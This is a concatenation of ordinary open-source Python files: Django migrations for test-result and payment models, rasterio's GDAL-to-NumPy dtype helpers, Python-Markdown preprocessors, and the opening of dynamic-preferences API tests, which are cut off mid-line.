models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"parent",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="children",
to="testresults.TestCodeUnit",
),
),
],
options={
"verbose_name": "Test Code Unit",
"verbose_name_plural": "Test Code Units",
},
),
migrations.CreateModel(
name="TestMethod",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(db_index=True, max_length=255)),
(
"testclass",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="methods",
to="testresults.TestClass",
),
),
],
options={"verbose_name": "Test Method"},
),
migrations.CreateModel(
name="TestResult",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("duration", models.FloatField(blank=True, db_index=True, null=True)),
(
"outcome",
models.CharField(
choices=[
(b"Pass", b"Pass"),
(b"CompileFail", b"CompileFail"),
(b"Fail", b"Fail"),
(b"Skip", b"Skip"),
],
db_index=True,
max_length=16,
),
),
("stacktrace", models.TextField(blank=True, null=True)),
("message", models.TextField(blank=True, null=True)),
(
"email_invocations_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"email_invocations_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"email_invocations_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"worst_limit",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"worst_limit_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"worst_limit_nontest",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"worst_limit_nontest_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"worst_limit_test",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"worst_limit_test_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"build_flow",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="test_results",
to="build.BuildFlow",
),
),
(
"method",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="test_results",
to="testresults.TestMethod",
),
),
],
options={
"verbose_name": "Test Result",
"verbose_name_plural": "Test Results",
},
),
migrations.AddField(
model_name="testcodeunit",
name="testresult",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="codeunits",
to="testresults.TestResult",
),
),
]
|
SalesforceFoundation/mrbelvedereci
|
metaci/testresults/migrations/0001_initial.py
|
Python
|
bsd-3-clause
| 26,271
|
"""Mapping of GDAL to Numpy data types.
Since 0.13 we are not importing numpy here and data types are strings.
Happily strings can be used throughout Numpy and so existing code will
not break.
Within Rasterio, to test data types, we use Numpy's dtype() factory to
do something like this:
if np.dtype(destination.dtype) == np.dtype(rasterio.uint8): ...
"""
bool_ = 'bool'
ubyte = uint8 = 'uint8'
uint16 = 'uint16'
int16 = 'int16'
uint32 = 'uint32'
int32 = 'int32'
float32 = 'float32'
float64 = 'float64'
complex_ = 'complex'
complex64 = 'complex64'
complex128 = 'complex128'
# Not supported:
# GDT_CInt16 = 8, GDT_CInt32 = 9, GDT_CFloat32 = 10, GDT_CFloat64 = 11
dtype_fwd = {
0: None, # GDT_Unknown
1: ubyte, # GDT_Byte
2: uint16, # GDT_UInt16
3: int16, # GDT_Int16
4: uint32, # GDT_UInt32
5: int32, # GDT_Int32
6: float32, # GDT_Float32
7: float64, # GDT_Float64
8: complex_, # GDT_CInt16
9: complex_, # GDT_CInt32
10: complex64, # GDT_CFloat32
11: complex128} # GDT_CFloat64
dtype_rev = dict((v, k) for k, v in dtype_fwd.items())
dtype_rev['uint8'] = 1
typename_fwd = {
0: 'Unknown',
1: 'Byte',
2: 'UInt16',
3: 'Int16',
4: 'UInt32',
5: 'Int32',
6: 'Float32',
7: 'Float64',
8: 'CInt16',
9: 'CInt32',
10: 'CFloat32',
11: 'CFloat64'}
typename_rev = dict((v, k) for k, v in typename_fwd.items())
dtype_ranges = {
'uint8': (0, 255),
'uint16': (0, 65535),
'int16': (-32768, 32767),
'uint32': (0, 4294967295),
'int32': (-2147483648, 2147483647),
'float32': (-3.4028235e+38, 3.4028235e+38),
'float64': (-1.7976931348623157e+308, 1.7976931348623157e+308)}
def _gdal_typename(dt):
try:
return typename_fwd[dtype_rev[dt]]
except KeyError:
return typename_fwd[dtype_rev[dt().dtype.name]]
def check_dtype(dt):
"""Check if dtype is a known dtype."""
if str(dt) in dtype_rev:
return True
elif callable(dt) and str(dt().dtype) in dtype_rev:
return True
return False
def get_minimum_dtype(values):
"""Determine minimum type to represent values.
Uses range checking to determine the minimum integer or floating point
data type required to represent values.
Parameters
----------
values: list-like
Returns
-------
rasterio dtype string
"""
import numpy as np
if not is_ndarray(values):
values = np.array(values)
min_value = values.min()
max_value = values.max()
if values.dtype.kind in ('i', 'u'):
if min_value >= 0:
if max_value <= 255:
return uint8
elif max_value <= 65535:
return uint16
elif max_value <= 4294967295:
return uint32
elif min_value >= -32768 and max_value <= 32767:
return int16
elif min_value >= -2147483648 and max_value <= 2147483647:
return int32
else:
if min_value >= -3.4028235e+38 and max_value <= 3.4028235e+38:
return float32
return float64
def is_ndarray(array):
"""Check if array is a ndarray."""
import numpy as np
return isinstance(array, np.ndarray) or hasattr(array, '__array__')
def can_cast_dtype(values, dtype):
"""Test if values can be cast to dtype without loss of information.
Parameters
----------
values: list-like
dtype: numpy dtype or string
Returns
-------
boolean
True if values can be cast to data type.
"""
import numpy as np
if not is_ndarray(values):
values = np.array(values)
if values.dtype.name == np.dtype(dtype).name:
return True
elif values.dtype.kind == 'f':
return np.allclose(values, values.astype(dtype))
else:
return np.array_equal(values, values.astype(dtype))
def validate_dtype(values, valid_dtypes):
"""Test if dtype of values is one of valid_dtypes.
Parameters
----------
values: list-like
valid_dtypes: list-like
list of valid dtype strings, e.g., ('int16', 'int32')
Returns
-------
boolean:
True if dtype of values is one of valid_dtypes
"""
import numpy as np
if not is_ndarray(values):
values = np.array(values)
return (values.dtype.name in valid_dtypes or
get_minimum_dtype(values) in valid_dtypes)
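# --- Editor's illustrative sketch (not part of the original module). ---
# A minimal, hedged demo of the helpers above; the __main__ guard keeps it
# from running on import, and the sample values are invented purely for
# illustration. Requires numpy, which the functions import lazily anyway.
if __name__ == '__main__':
    # 300 exceeds uint8's range, so the minimum unsigned type is uint16.
    assert get_minimum_dtype([0, 300]) == uint16
    # 255 round-trips through uint8, but 256 wraps, so that cast is lossy.
    assert can_cast_dtype([0, 255], 'uint8')
    assert not can_cast_dtype([0, 256], 'uint8')
    # dtype strings map back to GDAL type names via dtype_rev/typename_fwd.
    assert _gdal_typename('uint8') == 'Byte'
    assert check_dtype('float32')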
|
brendan-ward/rasterio
|
rasterio/dtypes.py
|
Python
|
bsd-3-clause
| 4,498
|
"""
PRE-PROCESSORS
=============================================================================
Preprocessors work on source text before we start doing anything too
complicated.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from . import util
from . import odict
import re
def build_preprocessors(md_instance, **kwargs):
""" Build the default set of preprocessors used by Markdown. """
preprocessors = odict.OrderedDict()
preprocessors['normalize_whitespace'] = NormalizeWhitespace(md_instance)
if md_instance.safeMode != 'escape':
preprocessors["html_block"] = HtmlBlockPreprocessor(md_instance)
preprocessors["reference"] = ReferencePreprocessor(md_instance)
return preprocessors
class Preprocessor(util.Processor):
"""
Preprocessors are run after the text is broken into lines.
Each preprocessor implements a "run" method that takes a pointer to a
list of lines of the document, modifies it as necessary and returns
either the same pointer or a pointer to a new list.
Preprocessors must extend markdown.Preprocessor.
"""
def run(self, lines):
"""
Each subclass of Preprocessor should override the `run` method, which
takes the document as a list of strings split by newlines and returns
the (possibly modified) list of lines.
"""
pass # pragma: no cover
class NormalizeWhitespace(Preprocessor):
""" Normalize whitespace for consistant parsing. """
def run(self, lines):
source = '\n'.join(lines)
source = source.replace(util.STX, "").replace(util.ETX, "")
source = source.replace("\r\n", "\n").replace("\r", "\n") + "\n\n"
source = source.expandtabs(self.markdown.tab_length)
source = re.sub(r'(?<=\n) +\n', '\n', source)
return source.split('\n')
class HtmlBlockPreprocessor(Preprocessor):
"""Remove html blocks from the text and store them for later retrieval."""
right_tag_patterns = ["</%s>", "%s>"]
attrs_pattern = r"""
\s+(?P<attr>[^>"'/= ]+)=(?P<q>['"])(?P<value>.*?)(?P=q) # attr="value"
| # OR
\s+(?P<attr1>[^>"'/= ]+)=(?P<value1>[^> ]+) # attr=value
| # OR
\s+(?P<attr2>[^>"'/= ]+) # attr
"""
left_tag_pattern = r'^\<(?P<tag>[^> ]+)(?P<attrs>(%s)*)\s*\/?\>?' % \
attrs_pattern
attrs_re = re.compile(attrs_pattern, re.VERBOSE)
left_tag_re = re.compile(left_tag_pattern, re.VERBOSE)
markdown_in_raw = False
def _get_left_tag(self, block):
m = self.left_tag_re.match(block)
if m:
tag = m.group('tag')
raw_attrs = m.group('attrs')
attrs = {}
if raw_attrs:
for ma in self.attrs_re.finditer(raw_attrs):
if ma.group('attr'):
if ma.group('value'):
attrs[ma.group('attr').strip()] = ma.group('value')
else:
attrs[ma.group('attr').strip()] = ""
elif ma.group('attr1'):
if ma.group('value1'):
attrs[ma.group('attr1').strip()] = ma.group('value1')
else:
attrs[ma.group('attr1').strip()] = ""
elif ma.group('attr2'):
attrs[ma.group('attr2').strip()] = ""
return tag, len(m.group(0)), attrs
else:
tag = block[1:].split(">", 1)[0].lower()
return tag, len(tag) + 2, {}
def _recursive_tagfind(self, ltag, rtag, start_index, block):
while 1:
i = block.find(rtag, start_index)
if i == -1:
return -1
j = block.find(ltag, start_index)
# if no ltag, or rtag found before another ltag, return index
if (j > i or j == -1):
return i + len(rtag)
# another ltag found before rtag, use end of ltag as starting
# point and search again
j = block.find('>', j)
start_index = self._recursive_tagfind(ltag, rtag, j + 1, block)
if start_index == -1:
                # HTML potentially malformed - ltag has no
                # corresponding rtag
return -1
def _get_right_tag(self, left_tag, left_index, block):
for p in self.right_tag_patterns:
tag = p % left_tag
i = self._recursive_tagfind("<%s" % left_tag, tag, left_index, block)
if i > 2:
return tag.lstrip("<").rstrip(">"), i
return block.rstrip()[-left_index:-1].lower(), len(block)
def _equal_tags(self, left_tag, right_tag):
if left_tag[0] in ['?', '@', '%']: # handle PHP, etc.
return True
if ("/" + left_tag) == right_tag:
return True
if (right_tag == "--" and left_tag == "--"):
return True
elif left_tag == right_tag[1:] and right_tag[0] == "/":
return True
else:
return False
def _is_oneliner(self, tag):
return (tag in ['hr', 'hr/'])
def _stringindex_to_listindex(self, stringindex, items):
"""
Same effect as concatenating the strings in items,
finding the character to which stringindex refers in that string,
and returning the index of the item in which that character resides.
"""
items.append('dummy')
i, count = 0, 0
while count <= stringindex:
count += len(items[i])
i += 1
return i - 1
def _nested_markdown_in_html(self, items):
"""Find and process html child elements of the given element block."""
for i, item in enumerate(items):
if self.left_tag_re.match(item):
left_tag, left_index, attrs = \
self._get_left_tag(''.join(items[i:]))
right_tag, data_index = self._get_right_tag(left_tag, left_index, ''.join(items[i:]))
right_listindex = \
self._stringindex_to_listindex(data_index, items[i:]) + i
if 'markdown' in attrs.keys():
items[i] = items[i][left_index:] # remove opening tag
placeholder = self.markdown.htmlStash.store_tag(left_tag, attrs, i + 1, right_listindex + 1)
items.insert(i, placeholder)
if len(items) - right_listindex <= 1: # last nest, no tail
right_listindex -= 1
items[right_listindex] = items[right_listindex][:-len(right_tag) - 2] # remove closing tag
else: # raw html
if len(items) - right_listindex <= 1: # last element
right_listindex -= 1
offset = 1 if i == right_listindex else 0
placeholder = self.markdown.htmlStash.store('\n\n'.join(items[i:right_listindex + offset]))
del items[i:right_listindex + offset]
items.insert(i, placeholder)
return items
def run(self, lines):
text = "\n".join(lines)
new_blocks = []
text = text.rsplit("\n\n")
items = []
left_tag = ''
right_tag = ''
in_tag = False # flag
while text:
block = text[0]
if block.startswith("\n"):
block = block[1:]
text = text[1:]
if block.startswith("\n"):
block = block[1:]
if not in_tag:
if block.startswith("<") and len(block.strip()) > 1:
if block[1:4] == "!--":
# is a comment block
left_tag, left_index, attrs = "--", 2, {}
else:
left_tag, left_index, attrs = self._get_left_tag(block)
right_tag, data_index = self._get_right_tag(left_tag,
left_index,
block)
# keep checking conditions below and maybe just append
if data_index < len(block) and (util.isBlockLevel(left_tag) or left_tag == '--'):
text.insert(0, block[data_index:])
block = block[:data_index]
if not (util.isBlockLevel(left_tag) or block[1] in ["!", "?", "@", "%"]):
new_blocks.append(block)
continue
if self._is_oneliner(left_tag):
new_blocks.append(block.strip())
continue
if block.rstrip().endswith(">") \
and self._equal_tags(left_tag, right_tag):
if self.markdown_in_raw and 'markdown' in attrs.keys():
block = block[left_index:-len(right_tag) - 2]
new_blocks.append(self.markdown.htmlStash.
store_tag(left_tag, attrs, 0, 2))
new_blocks.extend([block])
else:
new_blocks.append(self.markdown.htmlStash.store(block.strip()))
continue
else:
# if is block level tag and is not complete
if ((not self._equal_tags(left_tag, right_tag)) and (
util.isBlockLevel(left_tag) or left_tag == "--")):
items.append(block.strip())
in_tag = True
else:
new_blocks.append(self.markdown.htmlStash.store(block.strip()))
continue
else:
new_blocks.append(block)
else:
items.append(block)
right_tag, data_index = self._get_right_tag(left_tag, 0, block)
if self._equal_tags(left_tag, right_tag):
# if find closing tag
if data_index < len(block):
# we have more text after right_tag
items[-1] = block[:data_index]
text.insert(0, block[data_index:])
in_tag = False
if self.markdown_in_raw and 'markdown' in attrs.keys():
items[0] = items[0][left_index:]
items[-1] = items[-1][:-len(right_tag) - 2]
if items[len(items) - 1]: # not a newline/empty string
right_index = len(items) + 3
else:
right_index = len(items) + 2
new_blocks.append(self.markdown.htmlStash.store_tag(left_tag, attrs, 0, right_index))
placeholderslen = len(self.markdown.htmlStash.tag_data)
new_blocks.extend(self._nested_markdown_in_html(items))
nests = len(self.markdown.htmlStash.tag_data) - placeholderslen
self.markdown.htmlStash.tag_data[-1 - nests][
'right_index'] += nests - 2
else:
new_blocks.append(self.markdown.htmlStash.store('\n\n'.join(items)))
items = []
if items:
if self.markdown_in_raw and 'markdown' in attrs.keys():
items[0] = items[0][left_index:]
items[-1] = items[-1][:-len(right_tag) - 2]
if items[len(items) - 1]: # not a newline/empty string
right_index = len(items) + 3
else:
right_index = len(items) + 2
new_blocks.append(self.markdown.htmlStash.store_tag(left_tag, attrs, 0, right_index))
placeholderslen = len(self.markdown.htmlStash.tag_data)
new_blocks.extend(self._nested_markdown_in_html(items))
nests = len(self.markdown.htmlStash.tag_data) - placeholderslen
self.markdown.htmlStash.tag_data[-1 - nests][
'right_index'] += nests - 2
else:
new_blocks.append(self.markdown.htmlStash.store('\n\n'.join(items)))
new_blocks.append('\n')
new_text = "\n\n".join(new_blocks)
return new_text.split("\n")
class ReferencePreprocessor(Preprocessor):
""" Remove reference definitions from text and store for later use. """
TITLE = r'[ ]*(\"(.*)\"|\'(.*)\'|\((.*)\))[ ]*'
RE = re.compile(r'^[ ]{0,3}\[([^\]]*)\]:\s*([^ ]*)[ ]*(%s)?$' % TITLE, re.DOTALL)
TITLE_RE = re.compile(r'^%s$' % TITLE)
def run(self, lines):
new_text = []
while lines:
line = lines.pop(0)
m = self.RE.match(line)
if m:
id = m.group(1).strip().lower()
link = m.group(2).lstrip('<').rstrip('>')
t = m.group(5) or m.group(6) or m.group(7)
if not t:
# Check next line for title
tm = self.TITLE_RE.match(lines[0])
if tm:
lines.pop(0)
t = tm.group(2) or tm.group(3) or tm.group(4)
self.markdown.references[id] = (link, t)
else:
new_text.append(line)
return new_text # + "\n"
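# --- Editor's illustrative sketch (not part of the original module). ---
# A hedged demo of ReferencePreprocessor.RE against a classic reference
# definition; the sample line is invented for illustration. Group 1 is the
# id, group 2 the link, and group 5 a double-quoted title (run() above
# falls back to groups 6 and 7 for single quotes and parentheses).
if __name__ == '__main__':
    m = ReferencePreprocessor.RE.match('[ref]: http://example.com/ "A title"')
    assert m is not None
    assert m.group(1) == 'ref'
    assert m.group(2) == 'http://example.com/'
    assert m.group(5) == 'A title'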
|
Situphen/Python-ZMarkdown
|
markdown/preprocessors.py
|
Python
|
bsd-3-clause
| 13,793
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-05-23 13:25
from __future__ import unicode_literals
import bluebottle.utils.utils
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_extensions.db.fields
import django_extensions.db.fields.json
import django_fsm
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
('orders', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='OrderPayment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', django_fsm.FSMField(choices=[(b'created', 'Created'), (b'started', 'Started'), (b'cancelled', 'Cancelled'), (b'pledged', 'Pledged'), (b'authorized', 'Authorized'), (b'settled', 'Settled'), (b'charged_back', 'Charged_back'), (b'refunded', 'Refunded'), (b'failed', 'Failed'), (b'unknown', 'Unknown')], default=b'created', max_length=50, protected=True)),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='Updated')),
('closed', models.DateTimeField(blank=True, editable=False, null=True, verbose_name='Closed')),
('amount', models.DecimalField(decimal_places=2, max_digits=16, verbose_name='Amount')),
('transaction_fee', models.DecimalField(decimal_places=2, help_text='Bank & transaction fee, withheld by payment provider.', max_digits=16, null=True, verbose_name='Transaction Fee')),
('payment_method', models.CharField(blank=True, default=b'', max_length=20)),
('integration_data', django_extensions.db.fields.json.JSONField(blank=True, max_length=5000, verbose_name='Integration data')),
],
bases=(models.Model, bluebottle.utils.utils.FSMTransition),
),
migrations.CreateModel(
name='OrderPaymentAction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('type', models.CharField(blank=True, choices=[(b'redirect', 'Redirect'), (b'popup', 'Popup')], max_length=20, verbose_name='Authorization action type')),
('method', models.CharField(blank=True, choices=[(b'get', 'GET'), (b'post', 'POST')], max_length=20, verbose_name='Authorization action method')),
('url', models.CharField(blank=True, max_length=2000, verbose_name='Authorization action url')),
('payload', models.CharField(blank=True, max_length=5000, verbose_name='Authorization action payload')),
],
),
migrations.CreateModel(
name='Payment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', django_fsm.FSMField(choices=[(b'created', 'Created'), (b'started', 'Started'), (b'cancelled', 'Cancelled'), (b'pledged', 'Pledged'), (b'authorized', 'Authorized'), (b'settled', 'Settled'), (b'charged_back', 'Charged_back'), (b'refunded', 'Refunded'), (b'failed', 'Failed'), (b'unknown', 'Unknown')], default=b'started', max_length=50)),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='Updated')),
('order_payment', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='payments.OrderPayment')),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_payments.payment_set+', to='contenttypes.ContentType')),
],
options={
'ordering': ('-created', '-updated'),
},
),
migrations.CreateModel(
name='Transaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', django_extensions.db.fields.CreationDateTimeField(auto_now_add=True, verbose_name='Created')),
('updated', django_extensions.db.fields.ModificationDateTimeField(auto_now=True, verbose_name='Updated')),
('payment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='payments.Payment')),
('polymorphic_ctype', models.ForeignKey(editable=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='polymorphic_payments.transaction_set+', to='contenttypes.ContentType')),
],
options={
'ordering': ('-created', '-updated'),
},
),
migrations.AddField(
model_name='orderpayment',
name='authorization_action',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to='payments.OrderPaymentAction', verbose_name='Authorization action'),
),
migrations.AddField(
model_name='orderpayment',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='order_payments', to='orders.Order'),
),
migrations.AddField(
model_name='orderpayment',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='user'),
),
]
|
jfterpstra/bluebottle
|
bluebottle/payments/migrations/0001_initial.py
|
Python
|
bsd-3-clause
| 5,943
|
from __future__ import unicode_literals
import json
from decimal import Decimal
from django.test import TestCase
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.core.cache import caches
from dynamic_preferences.registries import (
global_preferences_registry as registry
)
from dynamic_preferences.users.registries import (
user_preferences_registry as user_registry
)
from dynamic_preferences.models import GlobalPreferenceModel
from dynamic_preferences.forms import global_preference_form_builder
from dynamic_preferences.api import serializers
from dynamic_preferences.users.serializers import UserPreferenceSerializer
from .test_app.models import BlogEntry
class BaseTest(object):
def tearDown(self):
caches['default'].clear()
class TestSerializers(BaseTest, TestCase):
def test_can_serialize_preference(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
serializer = serializers.GlobalPreferenceSerializer(pref)
data = serializer.data
self.assertEqual(
data['default'], pref.preference.api_repr(pref.preference.default))
self.assertEqual(
data['value'], pref.preference.api_repr(pref.value))
self.assertEqual(data['identifier'], pref.preference.identifier())
self.assertEqual(data['section'], pref.section)
self.assertEqual(data['name'], pref.name)
self.assertEqual(data['verbose_name'], pref.preference.verbose_name)
self.assertEqual(data['help_text'], pref.preference.help_text)
self.assertEqual(data['field']['class'], 'IntegerField')
self.assertEqual(data['field']['input_type'], 'number')
self.assertEqual(data['field']['widget']['class'], 'NumberInput')
def test_can_change_preference_value_using_serializer(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
data = {'value': 666}
serializer = serializers.GlobalPreferenceSerializer(pref, data=data)
is_valid = serializer.is_valid()
self.assertTrue(is_valid)
serializer.save()
pref = manager.get_db_pref(section='user', name='max_users')
self.assertEqual(pref.value, data['value'])
def test_serializer_also_uses_custom_clean_method(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
# will fail because of preference cleaning
data = {'value': 1001}
serializer = serializers.GlobalPreferenceSerializer(pref, data=data)
is_valid = serializer.is_valid()
self.assertFalse(is_valid)
self.assertIn('value', serializer.errors)
def test_serializer_includes_additional_data_if_any(self):
user = User(
username="user",
email="user@user.com")
user.set_password('test')
user.save()
manager = user_registry.manager(instance=user)
pref = manager.get_db_pref(
section='user', name='favorite_vegetable')
serializer = UserPreferenceSerializer(pref)
self.assertEqual(
serializer.data['additional_data']['choices'],
pref.preference.choices)
class TestViewSets(BaseTest, TestCase):
def setUp(self):
self.admin = User(
username="admin",
email="admin@admin.com",
is_superuser=True,
is_staff=True)
self.admin.set_password('test')
self.admin.save()
def test_global_preference_list_requires_permission(self):
url = reverse('api:global-list')
# anonymous
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
# not authorized
user = User(
username="user",
email="user@user.com")
user.set_password('test')
user.save()
        self.client.login(username='user', password='test')
response = self.client.get(url)
self.assertEqual(response.status_code, 403)
def test_can_list_preferences(self):
manager = registry.manager()
url = reverse('api:global-list')
self.client.login(username='admin', password="test")
response = self.client.get(url)
self.assertEqual(response.status_code, 200)
payload = json.loads(response.content.decode('utf-8'))
self.assertEqual(len(payload), len(registry.preferences()))
for e in payload:
pref = manager.get_db_pref(section=e['section'], name=e['name'])
serializer = serializers.GlobalPreferenceSerializer(pref)
self.assertEqual(pref.preference.identifier(), e['identifier'])
def test_can_detail_preference(self):
manager = registry.manager()
pref = manager.get_db_pref(section='user', name='max_users')
url = reverse(
